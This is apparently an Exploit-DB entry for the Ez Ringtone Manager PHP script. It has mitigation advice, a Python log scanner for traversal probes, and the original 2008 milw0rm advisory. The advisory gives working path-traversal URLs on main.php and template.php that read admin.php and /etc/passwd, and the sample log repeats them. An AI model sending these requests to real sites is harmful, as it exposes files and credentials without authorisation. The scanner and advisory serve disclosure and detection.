Vendor: Ez Ringtone Manager
By: b3hz4d
CVSS: 7.5 (HIGH)
Vulnerability Types: Remote File Disclosure, Local File Inclusion, SQL Injection, XSS
CWE: 22, 98, 89, 79
Product Name: Ez Ringtone Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Ez Ringtone Manager Multiple Vulnerabilities

The Ez Ringtone Manager application is vulnerable to Remote File Disclosure, Local File Inclusion, SQL Injection, and XSS. An attacker can exploit these vulnerabilities by sending crafted requests to the application; for example, a request to main.php or template.php with a malicious value in the id parameter (the path-traversal cases are shown in the advisory below).

Mitigation:

Developers should ensure that user-supplied input is validated and sanitized before it is used by the application. In particular, the id parameter handled by main.php and template.php should be restricted to expected values rather than used to build a file path, since the traversal sequences shown below otherwise reach files outside the application directory. The application should also be reviewed for the other issues listed (SQL injection and XSS) and for any similar injection points.
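A defender-side check for the traversal pattern in the id parameter described above. This is an added example, not code from the advisory, the vendor, or Exploit-DB: it scans constructed web-server access-log lines (common log format is assumed) for requests to main.php or template.php whose id value contains a parent-directory segment after percent-decoding, so that probes like the ones in the advisory surface in routine log review.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Scripts and parameter named in the advisory on this page.
VULN_SCRIPTS = ("main.php", "template.php")
VULN_PARAM = "id"

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Nov/2008:10:01:02 +0000] "GET /ringtones/main.php?action=detail&id=42 HTTP/1.1" 200 1532
203.0.113.7 - - [22/Nov/2008:10:01:09 +0000] "GET /ringtones/main.php?action=detail&id=../admin.php HTTP/1.1" 200 884
203.0.113.7 - - [22/Nov/2008:10:01:15 +0000] "GET /ringtones/template.php?action=detail&id=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2201
198.51.100.3 - - [22/Nov/2008:10:02:00 +0000] "GET /ringtones/index.php HTTP/1.1" 200 3100
"""

# Minimal common-log-format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise(value: str) -> str:
    """Percent-decode repeatedly (bounded, to catch double encoding) and unify separators."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def is_traversal(value: str) -> bool:
    """True if the decoded value contains a '..' path segment."""
    return re.search(r"(^|/)\.\.(/|$)", normalise(value)) is not None


def flag_requests(log_text: str) -> list:
    """Return one record per request to a listed script whose id parameter traverses."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlparse(m["target"])
        if url.path.rsplit("/", 1)[-1] not in VULN_SCRIPTS:
            continue
        # parse_qs already percent-decodes once; normalise() handles nested encoding.
        for value in parse_qs(url.query, keep_blank_values=True).get(VULN_PARAM, []):
            if is_traversal(value):
                hits.append({"ip": m["ip"], "ts": m["ts"], "script": url.path,
                             "id": normalise(value), "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the signal to escalate: it suggests the include succeeded rather than being rejected.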

Exploit-DB raw data:

        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +            Ez Ringtone Manager Multiple Vulnerabilities            +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 22 nov 2008
SITE   : WwW.DeltaHacking.Net


#####################################################

APPLICATION  : Ez Ringtone Manager
DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143
VENDOR       : http://www.scriptsez.net/
DEMO         : http://demo.scriptsez.net/ringtones/demo.html

#####################################################


[+] vuln    : ./main.php
              ./template.php


               The vulnerability is in main.php, which is included by template.php.


[1] Remote File Disclosure:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php
              http://victim.com/ringtones/template.php?action=detail&id=../admin.php

[2] Local File Inclusion:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
              http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd

##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com #

##########################################################################################################

# milw0rm.com [2008-11-22]